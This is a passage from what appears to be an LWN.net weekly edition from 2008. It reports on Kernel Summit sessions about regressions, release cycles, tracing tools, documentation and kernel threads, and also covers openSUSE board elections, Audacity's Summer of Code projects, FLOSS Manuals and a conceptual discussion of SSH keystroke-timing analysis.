release 2.6.27 would be in about three weeks.


One problem raised by Rafael was that fixes for regressions take far too
long to get into the mainline.  Some subsystem maintainers like to let
regression fixes sit in the linux-next tree for a while.  It was pointed
out, though, that presence in linux-next did not help find the original
regression, so there is unlikely to be any value in letting fixes age
there; they should, instead, go straight into the mainline.


Rafael also noted that some regressions attract no debugging effort at all;
it seems that nobody is interested in working on them.  It can be
disheartening for users to hear nothing about a reported regression at all;
somebody should at least tell them why the problem is not being worked on.
He also noted that regressions which have been bisected (to identify the
change which first caused the problem to happen) tend to get fixed much
more quickly.  The data from the bisection is undoubtedly useful, but the
real benefit probably comes from fingering the guilty party, who then feels
the need to get a fix in place.


Another thing Rafael pointed out is that we have a small core of dedicated
testers; most of our regressions are reported by a small, recurring group
of people.  Perhaps we could recruit some of those people to help with the
management of bugs.  They could track reports, get more information from
users, and harass maintainers to get fixes in place.  These people have
already shown a certain amount of dedication; giving them this kind of role
would let them expand the help they are able to give to the kernel
community. 

There was also some talk of trying to track the amount of test coverage the
kernel is receiving.  There could be some sort of mechanism set up, perhaps tied
into Fedora's "smolt" system, to report successful boots of the kernel on
specific hardware.  There are obvious privacy issues which would have to be
addressed, and the whole thing would take a certain amount of work.  It is
not clear that anybody feels this idea is important enough to put the
requisite amount of time into.

Release process

Matt Mackall asked a question: what would happen if we were to cut the
merge window down to one week - merging less code - and shorten the
development cycle to match?  With some discipline, maybe we could produce a
stable kernel release every six weeks.  Linus responded that he would love
to see this happen.  His main motivation was to reduce the size of the -rc1
releases, which have gotten quite big in recent development cycles.  A
smaller -rc1 would be easier to debug and should, hopefully, stabilize more
quickly.


Quite a bit of time went into discussing this idea.  The shorter merge
window was clearly worrisome to some developers who feel that the two-week
window is already painfully short.  Merging of trees with dependencies on
other trees would get harder.  It would also be harder to get good testing
coverage, since there would be less time for testers to play with each
release.  Some code simply takes a long time to fix; it's not clear that
this stabilization could be compressed into the shorter cycle.  There would
have to be some higher barriers to ensure that code which does get in
through a particular merge window is truly ready.


Andrew Morton jumped in with a complaint about code that shows up in the
mainline, but which has never made an appearance in linux-next or the -mm
tree.  He acknowledged that this would always happen, but asserted that it
should be an extraordinary event.  The guilty subsystem maintainer, he
says, should at least make excuses for doing this.  Much of the problem, it
was said, comes from vendors who show up with last-minute patches that they
want to see merged.  The answer was to tell them that it is too late, that
the merge window is for subsystem maintainers, not for vendors.

Getting back to the shorter cycle, Linus pointed out that it would require
a great deal of care from everybody involved, especially the first time
around.  It would require a development cycle which does not start with a
lot of pending code - a problem, since there is always a big pile of
patches waiting by the time the merge window opens.

Al Viro suggested only merging a subset of subsystem trees in any
development cycle, only accepting trivial patches from the rest.  James
Bottomley responded that, if his trees lost out in a given development
cycle, his definition of "trivial" would surely change.  Another suggestion
was to simply merge linux-next, but Linus did not like that.  He goes out
of his way to limit the amount of code he merges each day as a favor to the
people to test the nightly repository snapshots.  Pulling in all of
linux-next would make that impossible.
Yet another option is to only pull trees for which the pull request is in
place before the merge window opens.  This idea seemed popular for a while.

Just about when it looked like a consensus for trying the idea was settling
into place, Matthew Wilcox stated that he didn't like it.  His work
involves tracking down performance issues, a process which can take quite a
bit of time.  A shortened development cycle would not allow the time needed
to get that work done.  Andrew Morton said that he saw no real point in the
change; it wasn't addressing any of our biggest problems, and we would lose
economies of scale in testing large numbers of changes.  Dave Airlie said
it would require testers to do twice as much work, dealing with -rc1
kernels twice as often.  Ben Herrenschmidt worried that the tighter
deadlines would make developers rush, leading to lower-quality code.  And
Dave Jones said that changing the cycle would make future kernel releases
less predictable, making communications with vendors and customers harder.

These comments essentially ended the discussion of the shorter development
cycle idea.  In the end, concluded Linus, it was better not to mess with
something which isn't completely broken.  So nothing may have come with it,
but it was an interesting exploration of how things could be done
differently.

		KS2008: Tracing


Tracing is a hot issue in the Linux community, mostly as the result of the
actions of an allegedly friendly company: Sun Microsystems has been putting
a lot of marketing energy into telling customers that DTrace makes Solaris
a better system.  The fact of the matter is that Linux does not lack
tracing tools, but it does seem to lack tools which are usable to
the wider community.  The second day of the 2008 kernel summit started with
a pair of sessions dedicated to determining where the gaps are and trying
to figure out what to do about them.

James Bottomley started with a description of his experiences with
SystemTap, the utility which is most often cited as our answer to DTrace.
He had a lot of trouble getting it to work with his system.  In his mind,
the root cause for all this trouble is the simple fact that nobody from the
development community is actually using SystemTap.  A quick query of the
room suggested that about half of the developers present had tried using
SystemTap at one point or other; maybe 20% actually succeeded.  So there is
a roadblock of sorts here; SystemTap needs attention from kernel developers
to progress, but those developers find it unsuited to their needs and
difficult to use, so they tend to ignore it.


But kernel developers are not the targeted user base for a tool like
SystemTap; it is aimed at end users and deployed systems.  To help clarify
what those users need, Vinod Kutty from the Chicago Mercantile Exchange
took some time to talk about his needs for tracing tools.  In general,
these users need a higher level of visibility into running, production
systems.  They need to be able to track down slowdowns, look at the
environment in which processes are running, and, in general, to be able to
look in corners of the system which nobody will have anticipated in
advance.  All of this has to happen while the system is running in
production; it is, he says, somewhat like needing to look under the hood of
a car while driving at 100mph.


Also useful is the ability to run tracing tools in a "flight recorder"
mode, where an administrator can look at historical data after something
goes wrong.  And it is necessary to be able to look at user-space events as
well as those from the kernel.  Events generated in user space are often
more meaningful to the people running the system.  All of this is needed to
be able to communicate with distributors about where the problems come up,
so that the distributor can work toward a fix.  Current tracing tools for
Linux are insufficient.


Linus asked: is tracing needed primarily to track down bugs or to find
performance issues?  It turns out that performance problems are the big
issue.  James asked what parameters were the most important; the answer
mentioned individual process I/O events, user-space events, and the ability
to map user events to kernel-level events.


Moving on, Vinod also noted that low impact is important; the tracing tool
cannot place a heavy load on the system.  These tools need to start
quickly.  Current tools are far too big.  There is also a need for good
filtering; tracing tools can generate a lot of data.  Administrators
and developers need a way to boil down all that data to an amount they can
deal with.  Even better are tools which can spot problems in the trace
stream and raise red flags when they happen.


And, of course, tracing tools really cannot crash the system while they are
running.  SystemTap still falls a little short in this area; it's not hard
to bring down a system while trying to trace it.  Adding a DTrace-style
virtual machine was discussed; in theory, a VM can make the tracing tool
demonstrably safer.  Vinod responded that it could be useful, but the proof
of maturity is in watching the software run for a while.


This is where Linus came in to proclaim that he hates every tracing tool he
has seen.  SystemTap is far too complicated; these tools need to be
simpler.  Adding a virtual machine to SystemTap would just make things more
complicated; that's not the way to fix its problems.  According to Linus,
most of the problems solved by tracing come down to figuring out scheduling
issues, and we have the tools to do that now.  We should be making better
use of the simple tools which are currently in the kernel before trying to
put more complicated 
stuff in.  We should, for example, make latencytop work better
and push to get it into the enterprise distributions.  This "use the tools
we already have" suggestion came back many times during the session.


Christoph Hellwig brought up another recurring theme: while dynamic tracing
is nice, there is a lot of value to be had from well-placed static trace
points which are managed by the maintainer of the code.  Matthew Wilcox
added that the user-space trace points (for DTrace) added to PostgreSQL have
proved to be highly useful for database administrators; people running
PostgreSQL now have a strong motivation to do so on Solaris systems.  We
would do well to match that functionality on Linux.


A key component of SystemTap is the collection of "tapsets," scripts which
allow a user to look into the kernel for specific information.  These
tapsets are a problem, though; they are tightly tied to a specific kernel,
but the kernel is constantly being changed.  So tapsets go stale quickly.
Moving these tapsets into the kernel might help, but they will still be a
separate body of code which is prone to breaking.  Static trace points,
which can be maintained directly with the code they monitor, are much more
likely to continue to work in the long term.

Martin Bligh noted that Google maintains a set of 20-30 static trace points
for use with the LTTng trace tool.  This very small set of trace
points is sufficient to solve most problems that Google encounters.  Martin
will, hopefully, be posting those trace points for inclusion into the
mainline, though Google's associated tools might not be available.

Vinod finished this portion of the session by stating the he likes the
tapset concept.  It allows him (or somebody in his group) to write a script
aimed at a specific situation, and others can make use of it immediately.
There's no need to wait for the release of a more specialized tool.

Trace toolkits

Mathieu Desnoyers spent a few moments introducing the LTTng tracing package.  LTTng is a static
tracing tool, depending on markers placed in the kernel itself.  It has
been designed for high performance and simplicity; that, in turn, should
help to make it safe to use on production systems.  All LTTng trace points
have to be in the kernel code itself and be maintained by the appropriate
subsystem maintainers.

The core kernel code includes a module for precise time stamping (needed to
preserve the ordering of events which go through different per-CPU relay
buffers), the relaying code, and a netlink-driven module to control
tracing.  There is a user-space library and, of course, a set of analysis
tools.  LTTng can support "flight recorder" mode which can initiate tracing
when a specific trigger situation comes about.  There is also a mechanism
for putting markers into user space.

Frank Eigler spent some time talking about SystemTap; he used much of that
time to 
defend the design decisions which had been made.  When the SystemTap
project started, the kernel had almost no tracing features at all, so
they had to pick a path that worked.  Since there is a lot of hostility to
putting a virtual machine into the kernel, they had to go with code
generation instead.  They used kprobes because that was the mechanism that
was available.  And so on.  In general, SystemTap has a lot of the same
objectives as LTTng, plus, of course, the dynamic tracing feature.  There
are "some demos" showing working user-space tracing.

James stated that there was a real need for the users of these tools -
kernel developers, in this case - to provide input into how they work.
Frank responded that the SystemTap team has been crying out for people to
help.  It's clear, though, that this particular user base is not
sufficiently engaged in the development process.  It was said that the real
users of SystemTap are Red Hat consultants, who find that it works well
with the standard RHEL kernel.  But people trying to use SystemTap with a
current mainline kernel have to download "a shaky weekly tarball" to try to
make it work.  Until SystemTap is easier to use with the mainline kernel,
it will be a hard sell in the development community.

The problem there, of course, is that keeping SystemTap current while it is
out of the mainline tree is always going to be a struggle.  Resolving that
problem will require getting more of that code merged.  It seems that the
core SystemTap code is about 15,000 lines - small, according to Frank.
This could maybe go in, but Linus is resistant, saying that we need to get
the current, simple, in-kernel tracing tools into a usable state before we
try to add more of them.

Ted Ts'o remarked that there is a real difference with SystemTap: it is the
only Linux-based tracing package which, like DTrace, allows users to run code at the
trace points.  Thus it is able to do more complicated triggering,
filtering, and analysis.  Thomas Gleixner responded that this is all good,
but what is really needed is a simple trace package which does not require
the installation of a whole set of new tools.  He does tracing (using
ftrace) on a number of platforms, including embedded systems, and he isn't
willing to deal with the hassle involved in adding another complicated set
of software.

After that the conversation wandered into various, relatively obscure
technical topics like the details of how buffering mechanisms should work,
who should really be managing trace points, who manages instrumentation as
a whole, and so on. But there was a general sense that the summit wasn't
the venue for that kind of low-level detail, which isn't where the real
problems are anyway.  The tracing topic will be revisited at the Linux
Plumbers Conference, so it was decided to defer much of the discussion of
the details until then.

		The openSUSE Project's first board elections


The openSUSE Project is about to hold it's first board election.
The process is well underway, with the first phase nearly over.  All members of the openSUSE project
may vote and can run for the board positions, but there is a fast
approaching deadline in which to register
for this vote or to declare your intention to run for this election.  In
the last call for candidates, received a
bit too late for last week's LWN issue, states that application deadline
ends September 24th, 12:00 UTC.

An election
committee has been formed to oversee the elections.  Four people, two
from Novell and two from the community, will organize and oversee the
election.  Committee members Claes Backstrom, Andrew Wafaa, Marko Jung, and
Vincent Untz have agreed not to run for this election so that they might
remain impartial.

The initial openSUSE board was
appointed by Novell.  Pascal Bleser, a member of that board, has written a
blog post about the openSUSE Board and the elections giving his view of
the what the board does and does not do.  "One point that really must
be clarified (again) is that the Board is not responsible for taking
technical decisions. That's other people's job, e.g. AJ as the director of
openSUSE and platform, Coolo as the openSUSE distribution project manager,
or Michl as the openSUSE product manager."  Pascal also has a followup
post answering some additional questions about the time commitments and
involvement expected of a board member.

Andreas Jaeger, also a member of the current board, has also written
about the board, how it's organized and what upcoming board members
might expect.  "I'm part of the first openSUSE board and in my
opinion we're still bootstrapping it and forming it.  Federico mentioned
that it took the GNOME board several years until they were really
functional - so this shaping of the board is not only in the openSUSE
project an evolutionary process that takes time and is influenced by
e.g. (constructive) criticism, praise, communication in general, and
decisions."  New board members will be able to shape the board from
the inside.  With a new board, community members can also help shape the
board with questions, comments and letting their expectations be known.

The board will consist of five members, a Novell appointed chairperson, two
Novell employees and two community members (not employed by Novell).  So
far there are three Novell candidates and five non-Novell candidates.  The
list of candidates with pointers to their platforms can be found here.

We will soon be into the campaign period, which runs from September 25th to
October 9th.  During this time period will be blog entries
from the candidates, interviews by the openSUSE news team, and a
moderated Q&amp;A session on IRC.  There is also a feature in the
openSUSE election in which each eligible voter may appoint a second
openSUSE member to be eligible to vote.  The option to appoint a second
voter will be available during the campaign period and may allow a few
people who missed the September 24th deadline to vote.

The actual election begins as the campaign period ends.  Each eligible
voter will be able to cast their votes once.  No changes will be allowed.
Votes will be stored anonymously in the electronic system.  Ballots will be
closed October 23rd, the winners announced once the election committee has
had a chance to verify and count the votes.

If you care about the openSUSE project, this is a great time to get
involved.  Run for the board, vote in the election, and have a say in the
shape of things to come.

		Audacity gets new functionality via Google Summer of Code


Audacity is a
popular and
award winning
multi-track open-source and cross-platform audio editor project
that is built on the 
wxWidgets GUI library.
LWN looked at
Audacity in 2006.
The Audacity project

announced its participation in the 2008

Google Summer of Code student code writing event
on April 21, 2008.  GSoC 2008 is wrapping up and the
Audacity site notes the progress made this summer:


Four students participating with Audacity in Google Summer of Code successfully completed their projects, and their code will be in future versions of Audacity. The four projects were:
FFmpeg support, to greatly increase the range of file formats that can be imported and exported.
New GUI classes for future use in displaying audio tracks.
On-demand/level-of-detail file loading, for near-instant loading and editing of uncompressed files.
Sticky labels that stay with the audio through cut and paste.


The Audacity GSoC

projects page details the goals and achievements made by
the students, we'll examine the results.


Руслан Ижбулатов
worked on adding FFmpeg support to Audacity in order to allow
importing and exporting of a wider variety of audio file types.
From the FFmpeg site:
"FFmpeg is a complete solution to record, convert and stream audio and video. It includes libavcodec, the leading audio/video codec library. FFmpeg is developed under Linux, but it can compiled under most operating systems, including Windows."
Audacity natively supports the WAV AIFF, MP3, Ogg Vorbis, and FLAC
formats, the FFmpeg library supports those, and adds support for the
GSM WAV, MP2, M4A (AAC), AMR, WMA, and many more formats.
The

Project Progress page has details on how to access this
new functionality.
The page also includes the full list of FFmpeg supported formats.
The FFmpeg library can linked and loaded dynamically at run time,
this allows it to be distributed as a separate package and
removes any CODEC licensing issues from Audacity.


Johannes Kulick added two new wxWidgets GUI classes and used
those in Audacity to improve the display of audio tracks.
His
project abstract states:
"Audacitys main user interface is the track panel. Its GUI architecture is written from scratch by the audacity team and as the team noticed the TrackPanel.cpp is a horrendous mess which is neither easy to maintain nor to extend.
There are the wxWidgets classes wxGridSizer and wxFlexGridSizer which fit well in the requirements of the track panel. They arrange its content in a table. While in wxGridSizer all rows have the same height and all columns have the same width, in wxFlexGridSizer classes each row can have its own height and each column can have its own width. This is the way the Track panel is arranged, too, but there is one more thing which is important: the ability to drag and drop each track and drag the height of each track as well. And here is the big disadvantage of the wxWidgets classes: they lack the ability of being dragable. If there were classes which have these ability this would be a big step to get a cleaner track panel architecture for Audacity.
So the project idea is that I will implement two classes wxDragGridSizer and wxDragFlexGridSizer which have the ability to do exactly these things."
The

Project Progress tracks the steps that were done to achieve
the end results and the

additional report covers extra work that was done
to extend support for the wxAUI (Advanced User Interface)
toolbar and window docking library.


Michael Chinen's project involved
on-demand/level-of-detail file loading for near-instant loading and editing of uncompressed files.  The

Project Progress explains:
"The QuickLoad project added near-instant loading of PCM uncompressed files without waiting for waveform calculation to complete. Playing and editing is now possible on demand at any point in the track while the waveform image is still being calculated in the background."  The Description section further clarifies the new capability:
"Previously, it might be necessary to wait several minutes for the file to load and be useable while the waveform computation was completed.
The waveform image will draw itself automatically during computation, but users can move the point in the file from which computation takes place, thus allowing them to view and edit any point in the file instantly. "
This project also allowed for further improvements to Audacity:
"One of the reasons the Quickload project was approved was because the OD framework will provide a method in which other tasks, such as loading non-wav formats, processing effects, and exporting, can be made multithreaded. The current implementation of the OD framework is written generally so that this is possible, which means that future implementations of OD tasks will be done writing a minimum of code. Taking advantage of polymorphism, this kind of thing should get easier and easier as more tasks are made to support OD."


Mark Deutsch worked on adding
sticky labels that stay with the audio through cut and paste
operations.  The
Project Progress
explains:
"Label Track Enhancements removed a long-standing limitation that Audacity's labels did not stick to the audio track and move and edit with them."
Further:
"The biggest single addition from this project was the concept of linking tracks. Two or more linked tracks form a group. When an action is performed in one track, the other tracks in the group mirror that action. For example, if a group consists of one audio track and one label track, deleting part of the audio track will also delete that part of the label track.
This linking is done implicitly, and depends on the layout of the tracks. A group is defined as a set of contiguous audio tracks followed by a contiguous set of label tracks."
The sticky labels addition also improves the way Audacity
handles insertions and other operations:
"This functionality doesn't only handle deletes, though. Inserting audio, whether through pasting or using the "Generate" functions also shifts the grouped tracks correspondingly. The "Change" functions (Change Speed/Tempo/Pitch) are also supported. Slowing down a track will insert silence into linked tracks to keep all the tracks sync'd. Similarly, speeding up a track inserts silence into that track to achieve the same result."


Lars Luthman was unable to finish the fifth project,
Support for the LV2 plugin architecture,
but he did organize the problem space and produce some code that
should be useful for future work.
The

Project Progress report shows what was accomplished, and the
main Audacity

projects document explains how it ended:
"The project which did not pass still had plenty of good coding work and skill behind it, indeed believed to be fully working on the linux platform. It was communication, possibly to modify the goals shortly after mid term, that really let it down."


The 2008 GSoC projects added a number of useful new capabilities
to Audacity.  The wxWidgets project also benefited from the work
with some enhancements that can be used by other projects.
Once again, GSoC proves itself as a program that can focus
in on areas of open-source applications that need improvements,
and produce useful results in a short time span.
GSoC is successful in bringing the guidance of experienced mentors
together with the coding muscle of inspired students.


		User manuals for free software


Documentation for free software is generally a problem area, both for users
and developers.  But developers at least have the code to consult, whereas
most users are left poking around through menu items and consulting multiple
web pages.  The FLOSS Manuals
project is using techniques similar to those used in free software
development to produce manuals for users. 


The project seeks to create the kind of manuals that users may be used to
from proprietary software packages.  The project's About page describes the
manuals being produced:

FLOSS Manuals make free software more accessible by providing clear
documentation that accurately explains their purpose and use. Each manual
explains what the software does and what it doesn't do, what the interface
looks like, how to install it, how to set the most basic configuration
necessary, and how to use its main functions. To ensure the information
remains useful and up to date the manuals are regularly developed to add
more advanced uses, and to document changes and new versions of the
software.


There are a wide variety of
manuals in progress, covering graphics and audio tools, OpenOffice,
Firefox, WordPress for blogging, and more.  The most recent addition is a
set of eight manuals for the One Laptop Per Child XO.  These were created
as part of a XO/Sugar
book sprint held in August in Austin, Texas.  The manuals cover the XO
hardware and Sugar interface as well as six different activities that are
available 
as part of Sugar.


The use of a "sprint" is just part of the adoption of free software
development strategies.  The project is set up to allow for collaborative
development by a community.  FLOSS Manuals describes it this way:

The manuals on FLOSS Manuals are written by a community of people, who do a
variety of things to keep the manuals as up to date and accurate as
possible. Anyone can contribute to a manual – to fix a spelling
mistake, to 
add a more detailed explanation, to write a new chapter, or to start a
whole new manual. The way in which FLOSS Manuals are written mirrors the
way in which FLOSS (Free, libre open source) software itself is written: by
a community who contribute to and maintain the content. 


The manuals themselves are available in a variety of formats: HTML, PDF, as
well as dead tree.  One of the more interesting features is the remix capability.  Using an
AJAX interface, one can pick and choose from the 
chapters of existing manuals to create a custom manual that includes only
the pieces required for some group of users.  Remixers can choose their own
cover and title, then export it all as a PDF file.  Instead, one can also
cut and paste 
some javascript code into a web page that creates a reader application on
the page.  In this way, the custom manual will always be up-to-date with the
latest changes made to the chapters. 


FLOSS manuals clearly fill a niche that is needed in the free software
world.  The manuals have a rather
professional
look that will immediately stand out to users.  There is a lot of work
to be done, but it would appear that the project has made an excellent
start.  As one might guess, it is always looking for more interested folks
to write, edit, and proofread manuals.


(Thanks to LWN reader David Farning for suggesting we look at this project.)

		KS2008: Documentation


Your editor got talked into kicking off the kernel summit discussion on
documentation; if this coverage is sketchier than usual, it's because it's
hard to try to lead a discussion and take notes at the same time.  After
some of the obligatory introductory notes on how documentation is always a
problem, it was asked: how many kernel developers had actually gotten
something useful from the in-tree documentation directory recently?  Almost
all attendees raised their hands.  There is value, it seems, in the
documentation which is available now.

That said, there are also traps.  An aspiring camera driver author would,
upon exploring the documentation directory, stumble across a detailed file
describing just how those drivers should be written.  The author is Alan
Cox, who might be considered to be a reasonably authoritative source.  But
this document describes the deprecated Video4Linux1 API; if our author
wrote a new driver to that API, he or she would probably feel a little
misled once the initial reviews came back.  The value of that document in
2008 is probably negative.

There are plenty of equally musty documents in the kernel documentation tree.  The
real problem is that documentation has no subsystem maintainer, nobody who
will clean out the old stuff.  The legendary lack of organization in that
directory is also a result of a lack of overall maintenance.

The question that was put to the developers was: what do you want from
kernel documentation?  
Linus had a clear answer; what he wants is better release
notes for each kernel version.  It's not clear how to get there; maybe some
sort of automated way of finding descriptions of new features in the git
changelogs.  What's even less clear is how this work could improve on the
high-quality work done
over at the kernelnewbies.org site.

Matthew Wilcox asked for some quality control on documentation
submissions.  He noted, in particular, that the coding style document would
appear to have drifted from its original intent over the years.

One useful form of documentation that developers would like to see more of
is test programs for new features.  Test code for new system calls is
especially useful; it describes how the system call should work, and allows
architecture maintainers to verify that they have connected things up
properly.

There were questions on how much of the supplied kernel documentation is
truly useful; maybe much of it should be removed?  There are some obviously
useful files, like those describing kernel boot and tuning parameters.  The
KernelDoc documents have their value; much of that documentation appears in
the code itself, and the KernelDoc code checks to make sure that the
documentation matches the associated function definitions.  Much of the
rest tends to be out of date and unused.  

One result of the discussion might be an effort to remove some of the
oldest, most fictional documentation.  Beyond that, though, it looks mostly
like business as usual.

		OpenSSH and keystroke timings


Theoretical security weaknesses have a tendency to move from the realm of
theory to that of practice over time.  Sometimes it is the result of more
compute power being applied or better algorithms being developed, but a
weakness is certainly not going to get stronger.  So when Kevin Neff
started discussing fixing a weakness in
OpenSSH on the openbsd-misc mailing list, the folks writing it off as
"theoretical" may have been 
jumping the gun. 


When it is in interactive mode—a user typing into a terminal session
for example—ssh sends each key pressed by the user in a
separate packet.  By observing the timing between packets, an observer may
be able to determine something about what was typed just by using traffic
analysis, without 
attempting to break the encryption.  Researchers found that the
inter-packet timing correlated well with the inter-keystroke timing, so
that using 
statistical techniques they were able to reduce the search space for
cracking a password by a factor of 50.


This weakness was outlined in a 2001 paper entitled Timing analysis
of keystrokes and timing attacks on SSH" [PDF] which looked
specifically at the timing-based attack:   

In this paper we study users' keyboard dynamics and
show that the timing information of keystrokes does leak
information about the key sequences typed. Through
more detailed analysis we show that the timing information leaks about 1
bit of information about the content 
per keystroke pair. Because the entropy of passwords
is only 4-8 bits per character, this 1 bit per keystroke
pair information can reveal significant information about
the content typed.


The paper looked at the now-deprecated SSH1 protocol, which led some to conclude that it substantially invalidated the
weakness. Damien Miller pointed
out that it was likely to still be valid:

There is no reason to believe that keystroke timing attacks will be
impossible against protocol 2 where they work against protocol 1.
They might just be a little more tricky.

Pointing at the paper and discounting it because it is ssh1 only is
sticking your head in the sand. It is usually easier to research attacks
on simpler protocols and work up to more complicated ones later.


There is a fair amount of information that can be gleaned just by looking
at the traffic generated over an encrypted session, especially if the
attacker can gather a sizable amount of it.  There are fairly clear
patterns in interactive sessions that can be extracted and used
alongside the inter-keystroke timing information to potentially garner lots
of useful information.  Darrin Chandler describes it this way:

The reason why I think it's a weakness is that you can gather statistics
on typing and use those to infer things. I.e., you can extract
meaningful information from the encrypted session. If you're snooping on
ssh and see a short burst of typing followed by another ssh session from
the remote machine you can guess they typed 'ssh host.example.com' by
the length of typing and the host connected to. Nice crib. Oh, after
than connect was there another short burst? Probably the password. How
many keystrokes can probably be inferred. Perhaps stats on interkey
timing can be used to make some intelligent guesses, such as the 4th
char is NOT punctuation because is followed char 3 too closely. Or
whatever.


Overall, the reception to making OpenSSH less susceptible to this kind of
analysis was positive.  It is clearly a difficult attack to mount,
logistically if nothing else, but it is not impossible either.  Better
timing information or analysis techniques might make it easier over time as
well 
and that is enough of a reason to look at ways to fix it.


		KS2008: more minisummit reports


The kernel summit dedicated a slot on its second-day agenda to the
presentation of more minisummit reports and lightning talks.  First up was
Chris Wright, who reported from the virtualization minisummit held last
April in Austin.  The developers at the minisummit learned a lot about the
hardware roadmaps maintained by various vendors.  There was talk of
improving cooperation with Qemu.  The possibility of VMWare open-sourcing
its user-space tools was raised, though, it seems, there is no prospect of
getting that company's drivers released.  The problem with the drivers is
not legal; it's just that they are so tightly integrated with the VMWare
hypervisor that there is little point in putting them out there.

Beyond that, there were a number of discussions on topics (like
checkpoint/resume) which have since turned into code.  And it was noted
that the virtualization developers would like improved hugetlb support.
In particular, they like the active defragmentation patches which make it
more likely that huge page allocations will succeed.

David Miller discussed the 2008 networking minisummit, otherwise known as a
couple of developers wandering by his house to discuss ideas.  He mainly
talked about the multi-queue
work, which has been covered on LWN separately.  One interesting point
to note is that, while multi-queue is useful for wireless networking, it is
also an important high-end scalability improvement.  When the system tries
to drive a 10GB network card at full speed, the locking contention on a
single queue gets to be a significant performance problem.

Matt Mackall presented his bloatwatch work, which monitors
the text and data sizes of kernel releases.  Unsurprisingly, the kernel is
getting larger over time - a development which does not please embedded
systems vendors.  Bloatwatch allows interested people to see which code
changes caused a given kernel release to grow.  Matt would like to have
more people using this tool and trying to keep a lid on kernel growth.

It was suggested that bloatwatch could be run against linux-next and used
to catch bloat before it gets into the mainline.  Linus asked if growth
could be correlated with the information in the git repository, making it
possible to shame individual developers.

Overall, it was noted that kernel growth is lagging far behind Moore's law,
suggesting that the kernel is requiring a smaller portion of system memory
over time.  Still, it would be good to use even less; Matt figures that
about half the growth in the kernel is something which can be avoided with
some thought.

		KS2008: All about threads


Ben Herrenschmidt led a session on the management of thread pools in the
kernel.  Kernel threads are typically used as a way for kernel code to do
long-running work (which might sleep) as a separate task.  The main
mechanism used in the kernel now is the workqueue interface, but workqueues
are not perfect.  They have become a sort of last resort for all kinds of
tasks which need to run in process context.

Problems with workqueues include the fact that they serialize all tasks,
even when that serialization is not needed.  In some cases, this
serialization could lead to deadlocks.  Workqueues offer developers the
choice of setting up their own dedicated worker threads or using keventd -
a set of per-CPU threads shared across all users.  The dedicated threads
are often overkill for the developer's needs, but using keventd can lead to
unpredictable latencies.  Often there is no good choice.  What's needed is
an API that can allow more than one thing to happen on any given CPU while
still providing shared threads and low latency.

One idea is to allow keventd to fork.  There could be a new form of
workqueue with an "asynchronous" flag set.  When a task is queued, keventd
would fork and process the task immediately.  It would be a relatively easy
change to make, but it would also be somewhat inefficient - forks are
expensive.

Another option would be to go with one of the existing thread pool
implementations; there are already a few in circulation.  The pdflush daemon
has a simple mechanism which can grow and shrink the pool of threads based
on demand.  Btrfs has a thread pool which is tightly tailored to its needs;
it does not resize the pool, but it does provide low latency.  The sunrpc
code has a thread pool which Ben described as "scary."  There is also a
proposal from David Howells for a "slow work" mechanism.  It is the most
generic of the options, and supports resizing as well.

The options were discussed for a bit; Linus's suggestion at the end was to
just extend the workqueue interface to provide a small, fixed-size pool.
Ben replied that the code for resizing the pool is sufficiently simple that
there is no point in leaving it out.

Thomas Gleixner led a discussion on a related subject: the threaded
interrupt handlers which are currently living in the realtime tree.  It
seems that 
the realtime developers have finally recovered from having taken on the
maintainership of the x86 code and are now getting back to thinking about
getting the remaining realtime code merged.

The realtime tree is set up to thread almost all interrupt handlers, but
that will not work for the mainline.  Some devices will continue to run
with synchronous interrupt handling, and the idea of running software
interrupts in threads is not popular with the networking developers.  So
the suggestion is to provide a new version of request_irq() which
would allow a driver to set up a threaded interrupt handler.  In the
absence of a change by the driver maintainer, interrupt handlers would
continue to be run synchronously.

Linus strongly requested that a new request function be added, rather than making a
change to request_irq() itself.  It seems he is still feeling the
pain of previous changes to request_irq(), which have required
fixing massive numbers of drivers.  The separate request function was
always in the plan; the requirements are significantly different.  In
particular, drivers using threaded interrupt handlers still need to provide
a small, synchronous handler which can determine whether the driver's
device is actually interrupting.  Without that small handler, it is hard to
make the handling of shared interrupt lines work right.

There was some discussion of details, but no real objection to the overall
plan.  So chances are good that threaded interrupt handlers will be posted
for the 2.6.28 or 2.6.29 development cycles.

		KS2008: Kernel code with large user-space components


The direct rendering infrastructure (DRI) code has always played by different
rules than the rest of the kernel.  It is an out-of-tree project which has
produced wildly different sets of APIs over the years.  And it has never
quite been as good as anybody would like.  This recent LWN article covers
some changes happening in the DRI camp.
The unique nature of DRI can be traced back to the fact that much of
the problem can only be solved in user space.  At the 2008 kernel summit,
graphics developer Dave Airlie led a session on "best practices" for the
creation of kernel code which, like DRI, has large user-space pieces.

Dave says that developers for much of the kernel have an easy life; they can
work toward the implementation of a well-defined interface which has been
specified by POSIX for years.  But some folks are not so privileged.  In
the graphics world, every device must expose a different interface to user
space; every attempt to standardize these interfaces has produced highly
ugly results.  There is no standard here, and there is no real prospect of
creating one.

Actually, that is not quite true; the standard for this kind of device is
OpenGL.  But there is little interest in putting a full OpenGL
implementation into the kernel itself.  So there has to be a wide channel
of communication between user space and the kernel, and it will always be
somewhat device-specific.

The DRI project develops its code outside of the mainline because
stabilizing this user-space API is hard.  The bulk of the code (90%) is in user
space, and, until all that user-space code works, it is not at all clear
that the interface with the kernel is correct.  Once the code goes into the
mainline, that API must be frozen.  So DRI code will remain outside until
the developers can be confident that the API has reached a stable state.

The other reason for out-of-tree development is the need to make life
easier for testers.  There are a fair number of people who are interested
in testing graphics drivers, but who are not kernel developers.  The DRI
project wants to allow these testers to operate on a stable base - the
kernel provided by their distributor, preferably - and not have to run
bleeding-edge mainline kernels.  So the DRI code has enough
backward-compatibility code in it to allow it to run with a range of kernel
versions.  This code is not welcome in the mainline, so it must be removed
before any DRI code is submitted upstream.  But it must remain in the DRI
tree, or the project will lose a lot of testers.

Dave had a couple of requests for the kernel development community.  One of
those was to be allowed to keep the backward compatibility code even when
drivers are sent upstream.  Compatibility would not have to be long term -
three development cycles, perhaps - but the ability to run across that
range of kernels would make life a lot easier.  It would also eliminate the
need for the DRI developers to rewrite the code immediately before
submission to the mainline - a process which does not help to assure stable
operation. There was not a lot of
opposition to this idea.  Linus did note, though, that the DRI developers
have not been complaining about API changes which cause them trouble.  His
suggestion was that they let the community know when API changes create
pain; perhaps some of those changes could be reworked to lower their impact
on out-of-tree code.

The other request was to be allowed to put exports for kernel symbols into
the mainline even though the code using those exports is not yet being
merged.  The presence of those exports would, again, make life easier for
testers.  This idea, too, drew no serious opposition.  It was suggested
that any such exports should be accompanied by a comment explaining why it
exists and should not be removed.

		KS2008: Fixing the Kernel Janitors Project


James Bottomley started off this session by saying that he had proposed it
